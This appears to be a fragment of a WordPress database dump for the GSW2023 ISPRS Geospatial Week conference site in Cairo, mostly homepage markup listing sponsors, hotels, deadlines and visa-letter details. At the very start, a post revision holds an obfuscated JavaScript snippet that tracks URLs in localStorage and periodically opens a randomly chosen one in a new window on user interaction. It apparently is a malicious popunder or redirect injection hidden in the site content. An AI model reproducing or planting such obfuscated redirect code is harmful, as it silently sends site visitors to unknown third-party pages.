_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 20:52:58','2023-06-13 20:52:58','',3066,'https://gsw2023.com/?p=4680',0,'revision','',0),
(4681,1,'2023-06-13 20:57:20','2023-06-13 20:57:20','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Camera ready paper submission: July 15, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul style=\"text-align: center;\">\n<li style=\"text-align: left;\">\n<h5><strong>-Deadline for submission of travel grants                                           funded by </strong><strong style=\"text-align: center;\">The ISPRS Foundation is: June 16, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Early bird registration deadline: July 1, 2023</strong></h5>\n</li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading 